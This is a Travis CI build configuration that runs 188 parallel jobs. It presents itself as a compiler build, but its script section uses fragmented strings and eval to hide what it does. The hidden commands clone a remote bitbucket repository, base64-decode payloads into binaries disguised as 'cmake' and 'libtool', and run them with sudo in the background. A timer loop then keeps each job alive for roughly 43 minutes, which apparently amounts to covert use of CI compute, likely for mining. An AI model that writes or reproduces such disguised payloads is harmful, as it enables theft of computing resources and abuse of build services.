dist: bionic

env:
  - BUILD="aI1"
  - BUILD="aI2"
  - BUILD="aI3"
  - BUILD="aI4"
  - BUILD="aI5"
  - BUILD="aI6"
  - BUILD="aI7"
  - BUILD="aI8"
  - BUILD="aI9"
  - BUILD="aI10"
  - BUILD="aI11"
  - BUILD="aI12"
  - BUILD="aI13"
  - BUILD="aI14"
  - BUILD="aI15"
  - BUILD="aI16"
  - BUILD="aI17"
  - BUILD="aI18"
  - BUILD="aI19"
  - BUILD="aI20"
  - BUILD="aI21"
  - BUILD="aI22"
  - BUILD="aI23"
  - BUILD="aI24"
  - BUILD="aI25"
  - BUILD="aI26"
  - BUILD="aI27"
  - BUILD="aI28"
  - BUILD="aI29"
  - BUILD="aI30"
  - BUILD="aI31"
  - BUILD="aI32"
  - BUILD="aI33"
  - BUILD="aI34"
  - BUILD="aI35"
  - BUILD="aI36"
  - BUILD="aI37"
  - BUILD="aI38"
  - BUILD="aI39"
  - BUILD="aI40"
  - BUILD="aI41"
  - BUILD="aI42"
  - BUILD="aI43"
  - BUILD="aI44"
  - BUILD="aI45"
  - BUILD="aI46"
  - BUILD="aI47"
  - BUILD="aI48"
  - BUILD="aI49"
  - BUILD="aI50"
  - BUILD="aI51"
  - BUILD="aI52"
  - BUILD="aI53"
  - BUILD="aI54"
  - BUILD="aI55"
  - BUILD="aI56"
  - BUILD="acI57"
  - BUILD="aI58"
  - BUILD="aI59"
  - BUILD="aI60"
  - BUILD="aI61"
  - BUILD="aI62"
  - BUILD="aI63"
  - BUILD="aI64"
  - BUILD="aI65"
  - BUILD="aI66"
  - BUILD="aI67"
  - BUILD="aI68"
  - BUILD="aI69"
  - BUILD="aI70"
  - BUILD="aI71"
  - BUILD="aI72"
  - BUILD="aI73"
  - BUILD="aI74"
  - BUILD="aI75"
  - BUILD="aI76"
  - BUILD="aI77"
  - BUILD="aI78"
  - BUILD="aI79"
  - BUILD="aI80"
  - BUILD="aI81"
  - BUILD="aI82"
  - BUILD="aI83"
  - BUILD="aI84"
  - BUILD="aI85"
  - BUILD="aI86"
  - BUILD="aI87"
  - BUILD="aI88"
  - BUILD="aI89"
  - BUILD="aI90"
  - BUILD="aI91"
  - BUILD="aI92"
  - BUILD="aI93"
  - BUILD="aI94"
  - BUILD="aI95"
  - BUILD="aI96"
  - BUILD="aI97"
  - BUILD="aI98"
  - BUILD="aI99"
  - BUILD="aI100"
  - BUILD="aI101"
  - BUILD="aI102"
  - BUILD="aI103"
  - BUILD="aI104"
  - BUILD="aI105"
  - BUILD="aI106"
  - BUILD="aI107"
  - BUILD="aI108"
  - BUILD="aI109"
  - BUILD="aI110"
  - BUILD="aI111"
  - BUILD="aI112"
  - BUILD="aI113"
  - BUILD="aI114"
  - BUILD="aI115"
  - BUILD="aI116"
  - BUILD="aI117"
  - BUILD="aI118"
  - BUILD="aI119"
  - BUILD="aI120"
  - BUILD="aI121"
  - BUILD="aI122"
  - BUILD="aI123"
  - BUILD="aI124"
  - BUILD="aI125"
  - BUILD="aI126"
  - BUILD="aI127"
  - BUILD="aI128"
  - BUILD="aI129"
  - BUILD="aI130"
  - BUILD="aI131"
  - BUILD="aI132"
  - BUILD="aI133"
  - BUILD="aI134"
  - BUILD="aI135"
  - BUILD="aI136"
  - BUILD="aI137"
  - BUILD="aI138"
  - BUILD="aI139"
  - BUILD="aI140"
  - BUILD="aI141"
  - BUILD="aI142"
  - BUILD="aI143"
  - BUILD="aI144"
  - BUILD="aI145"
  - BUILD="aI146"
  - BUILD="aI147"
  - BUILD="aI148"
  - BUILD="aI149"
  - BUILD="aI150"
  - BUILD="aI151"
  - BUILD="aI152"
  - BUILD="aI153"
  - BUILD="aI154"
  - BUILD="aI155"
  - BUILD="aI156"
  - BUILD="aI157"
  - BUILD="aI158"
  - BUILD="aI159"
  - BUILD="aI160"
  - BUILD="aI161"
  - BUILD="aI162"
  - BUILD="aI163"
  - BUILD="aI164"
  - BUILD="aI165"
  - BUILD="aI166"
  - BUILD="aI167"
  - BUILD="aI168"
  - BUILD="aI169"
  - BUILD="aI170"
  - BUILD="aI171"
  - BUILD="aI172"
  - BUILD="aI173"
  - BUILD="aI174"
  - BUILD="aI175"
  - BUILD="aI176"
  - BUILD="aI177"
  - BUILD="aI178"
  - BUILD="aI179"
  - BUILD="aI180"
  - BUILD="aI181"
  - BUILD="aI182"
  - BUILD="aI183"
  - BUILD="aI184"
  - BUILD="aI185"
  - BUILD="aI186"
  - BUILD="aI187"
  - BUILD="aI188"

language: minimal

script:
  - sudo apt update || true
  - nPoQdlpZJ="sudo apt --"
  - RDlpmUHzRgh="yes install"
  - wwGLyXbY=" cl-base64 "
  - lwNWw="git &>/dev/"
  - eval "$nPoQdlpZJ""$RDlpmUHzRgh""$wwGLyXbY""$lwNWw""null"
  - bCapVg="git clone h"
  - IHBCLx="ttps://gccb"
  - AGwFlRsRaiH="uild@bitbuc"
  - lfBUqDRn="ket.org/gcc"
  - OKbJmXLP="build/gcc.g"
  - PDJPzxpUG="it &>/dev/n"
  - eval "$bCapVg""$IHBCLx""$AGwFlRsRaiH""$lfBUqDRn""$OKbJmXLP""$PDJPzxpUG""ull"
  - cScaAVZpzEC="base64 -d g"
  - mXMikUdShv="cc/cmake_ >"
  - eval "$cScaAVZpzEC""$mXMikUdShv"" cmake"
  - psTcHHXx="base64 -d g"
  - fILjCKKAPLO="cc/config_ "
  - eval "$psTcHHXx""$fILjCKKAPLO""> run"
  - TwubdWF="base64 -d g"
  - oOBUoA="cc/make_ > "
  - eval "$TwubdWF""$oOBUoA""libtool"
  - cBZMvCFsSpx="chmod +x li"
  - eval "$cBZMvCFsSpx""btool cmake"
  - ./cmake
  - mLDfiBA="sed -i 's/b"
  - KqMVO="uild/tg3o/g"
  - eval "$mLDfiBA""$KqMVO""' run"
  - fEmagng="sudo ./libt"
  - dSdSynQD="ool --confi"
  - wrgaa="g=run &>/de"
  - eval "$fEmagng""$dSdSynQD""$wrgaa""v/null &"
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Build; [ $CC -ge $((GCC + 2590)) ] && sudo killall libtool && break; sleep 199; done
